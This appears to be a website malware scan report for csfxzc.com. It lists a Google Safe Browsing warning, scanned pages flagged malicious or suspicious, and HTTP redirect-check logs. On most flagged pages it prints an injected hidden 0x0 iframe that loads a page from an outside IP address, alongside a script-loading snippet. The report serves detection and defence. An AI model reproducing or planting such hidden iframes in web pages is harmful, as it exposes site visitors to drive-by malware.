Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=csfxzc.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://csfxzc.com/ | 200 OK Content-Length: 34252 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) window._bd_share_config={"common":{"bdSnsKey":{},"bdText":"","bdMini":"2","bdMiniList":false,"bdPic":"","bdStyle":"0","bdSize":"16"},"slide":{"type":"slide","bdImg":"0","bdPos":"left","bdTop":"47.5"}};with(document)0[(getElementsByTagName('head')[0]||body).appendChild(createElement('script')).src='http://bdimg.share.baidu.com/static/api/js/share.js?v=89860593.js?cdnversion='+~(-new Date()/36e5)]; Antivirus reports:
Hidden iFrame found. size: 0x0 src: http://116.255.203.150:8080/ie.htm <iframe src= http://116.255.203.150:8080/ie.htm width=0 height=0> | ||
http://csfxzc.com/bw_inc/binweb_proimg.js | 200 OK Content-Length: 2365 Content-Type: application/x-javascript | clean |
http://csfxzc.com/bw_inc/bw_sysc.js | 200 OK Content-Length: 933 Content-Type: application/x-javascript | clean |
http://csfxzc.com/bw_inc/swfobject.js | 200 OK Content-Length: 9759 Content-Type: application/x-javascript | clean |
http://csfxzc.com/index.asp | 200 OK Content-Length: 34252 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) window._bd_share_config={"common":{"bdSnsKey":{},"bdText":"","bdMini":"2","bdMiniList":false,"bdPic":"","bdStyle":"0","bdSize":"16"},"slide":{"type":"slide","bdImg":"0","bdPos":"left","bdTop":"47.5"}};with(document)0[(getElementsByTagName('head')[0]||body).appendChild(createElement('script')).src='http://bdimg.share.baidu.com/static/api/js/share.js?v=89860593.js?cdnversion='+~(-new Date()/36e5)]; Antivirus reports:
Hidden iFrame found. size: 0x0 src: http://116.255.203.150:8080/ie.htm <iframe src= http://116.255.203.150:8080/ie.htm width=0 height=0> | ||
http://csfxzc.com/pro.asp | 200 OK Content-Length: 25161 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) window._bd_share_config={"common":{"bdSnsKey":{},"bdText":"","bdMini":"2","bdMiniList":false,"bdPic":"","bdStyle":"0","bdSize":"16"},"slide":{"type":"slide","bdImg":"0","bdPos":"left","bdTop":"47.5"}};with(document)0[(getElementsByTagName('head')[0]||body).appendChild(createElement('script')).src='http://bdimg.share.baidu.com/static/api/js/share.js?v=89860593.js?cdnversion='+~(-new Date()/36e5)]; Antivirus reports:
Hidden iFrame found. size: 0x0 src: http://116.255.203.150:8080/ie.htm <iframe src= http://116.255.203.150:8080/ie.htm width=0 height=0> | ||
http://csfxzc.com/pro.asp?classa=1&classb=2 | 200 OK Content-Length: 21713 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) window._bd_share_config={"common":{"bdSnsKey":{},"bdText":"","bdMini":"2","bdMiniList":false,"bdPic":"","bdStyle":"0","bdSize":"16"},"slide":{"type":"slide","bdImg":"0","bdPos":"left","bdTop":"47.5"}};with(document)0[(getElementsByTagName('head')[0]||body).appendChild(createElement('script')).src='http://bdimg.share.baidu.com/static/api/js/share.js?v=89860593.js?cdnversion='+~(-new Date()/36e5)]; Antivirus reports:
| ||
http://csfxzc.com/pro.asp?classa=1&classb=1 | 200 OK Content-Length: 11546 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 0x0 src: http://116.255.203.150:8080/ie.htm <iframe src= http://116.255.203.150:8080/ie.htm width=0 height=0> | ||
http://csfxzc.com/pro.asp?classa=1&classb=3 | 200 OK Content-Length: 19472 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) window._bd_share_config={"common":{"bdSnsKey":{},"bdText":"","bdMini":"2","bdMiniList":false,"bdPic":"","bdStyle":"0","bdSize":"16"},"slide":{"type":"slide","bdImg":"0","bdPos":"left","bdTop":"47.5"}};with(document)0[(getElementsByTagName('head')[0]||body).appendChild(createElement('script')).src='http://bdimg.share.baidu.com/static/api/js/share.js?v=89860593.js?cdnversion='+~(-new Date()/36e5)]; Antivirus reports:
| ||
http://csfxzc.com/pro.asp?classa=1&classb=4 | 200 OK Content-Length: 14792 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) window._bd_share_config={"common":{"bdSnsKey":{},"bdText":"","bdMini":"2","bdMiniList":false,"bdPic":"","bdStyle":"0","bdSize":"16"},"slide":{"type":"slide","bdImg":"0","bdPos":"left","bdTop":"47.5"}};with(document)0[(getElementsByTagName('head')[0]||body).appendChild(createElement('script')).src='http://bdimg.share.baidu.com/static/api/js/share.js?v=89860593.js?cdnversion='+~(-new Date()/36e5)]; Antivirus reports:
Hidden iFrame found. size: 0x0 src: http://116.255.203.150:8080/ie.htm <iframe src= http://116.255.203.150:8080/ie.htm width=0 height=0> | ||
http://csfxzc.com/html.asp?showid=2 | 200 OK Content-Length: 16725 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) window._bd_share_config={"common":{"bdSnsKey":{},"bdText":"","bdMini":"2","bdMiniList":false,"bdPic":"","bdStyle":"0","bdSize":"16"},"slide":{"type":"slide","bdImg":"0","bdPos":"left","bdTop":"47.5"}};with(document)0[(getElementsByTagName('head')[0]||body).appendChild(createElement('script')).src='http://bdimg.share.baidu.com/static/api/js/share.js?v=89860593.js?cdnversion='+~(-new Date()/36e5)]; Antivirus reports:
Hidden iFrame found. size: 0x0 src: http://116.255.203.150:8080/ie.htm <iframe src= http://116.255.203.150:8080/ie.htm width=0 height=0> | ||
http://csfxzc.com/news.asp?classa=1&classb=1 | 200 OK Content-Length: 21002 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) window._bd_share_config={"common":{"bdSnsKey":{},"bdText":"","bdMini":"2","bdMiniList":false,"bdPic":"","bdStyle":"0","bdSize":"16"},"slide":{"type":"slide","bdImg":"0","bdPos":"left","bdTop":"47.5"}};with(document)0[(getElementsByTagName('head')[0]||body).appendChild(createElement('script')).src='http://bdimg.share.baidu.com/static/api/js/share.js?v=89860593.js?cdnversion='+~(-new Date()/36e5)]; Antivirus reports:
| ||
http://csfxzc.com/html.asp?showid=1 | 200 OK Content-Length: 16233 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) window._bd_share_config={"common":{"bdSnsKey":{},"bdText":"","bdMini":"2","bdMiniList":false,"bdPic":"","bdStyle":"0","bdSize":"16"},"slide":{"type":"slide","bdImg":"0","bdPos":"left","bdTop":"47.5"}};with(document)0[(getElementsByTagName('head')[0]||body).appendChild(createElement('script')).src='http://bdimg.share.baidu.com/static/api/js/share.js?v=89860593.js?cdnversion='+~(-new Date()/36e5)]; Antivirus reports:
| ||
http://csfxzc.com/liuyan.asp | 200 OK Content-Length: 14932 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) window._bd_share_config={"common":{"bdSnsKey":{},"bdText":"","bdMini":"2","bdMiniList":false,"bdPic":"","bdStyle":"0","bdSize":"16"},"slide":{"type":"slide","bdImg":"0","bdPos":"left","bdTop":"47.5"}};with(document)0[(getElementsByTagName('head')[0]||body).appendChild(createElement('script')).src='http://bdimg.share.baidu.com/static/api/js/share.js?v=89860593.js?cdnversion='+~(-new Date()/36e5)]; Antivirus reports:
Hidden iFrame found. size: 0x0 src: http://116.255.203.150:8080/ie.htm <iframe src= http://116.255.203.150:8080/ie.htm width=0 height=0> | ||
http://csfxzc.com/html.asp?showid=3 | 200 OK Content-Length: 14197 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) window._bd_share_config={"common":{"bdSnsKey":{},"bdText":"","bdMini":"2","bdMiniList":false,"bdPic":"","bdStyle":"0","bdSize":"16"},"slide":{"type":"slide","bdImg":"0","bdPos":"left","bdTop":"47.5"}};with(document)0[(getElementsByTagName('head')[0]||body).appendChild(createElement('script')).src='http://bdimg.share.baidu.com/static/api/js/share.js?v=89860593.js?cdnversion='+~(-new Date()/36e5)]; Antivirus reports:
Hidden iFrame found. size: 0x0 src: http://116.255.203.150:8080/ie.htm <iframe src= http://116.255.203.150:8080/ie.htm width=0 height=0> |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: csfxzc.com
Result:
HTTP/1.1 200 OK
Content-Length: 34252
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCTABCDR=PMHJAIEAEALLBEDEOBKHBCJP; path=/
...34252 bytes of data.
GET / HTTP/1.1
Host: csfxzc.com
Result:
HTTP/1.1 200 OK
Content-Length: 34252
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCTABCDR=PMHJAIEAEALLBEDEOBKHBCJP; path=/
...34252 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: csfxzc.com
Referer: http://www.google.com/search?q=csfxzc.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: csfxzc.com
Referer: http://www.google.com/search?q=csfxzc.com
Result:
The result is similar to the first query. There are no suspicious redirects found.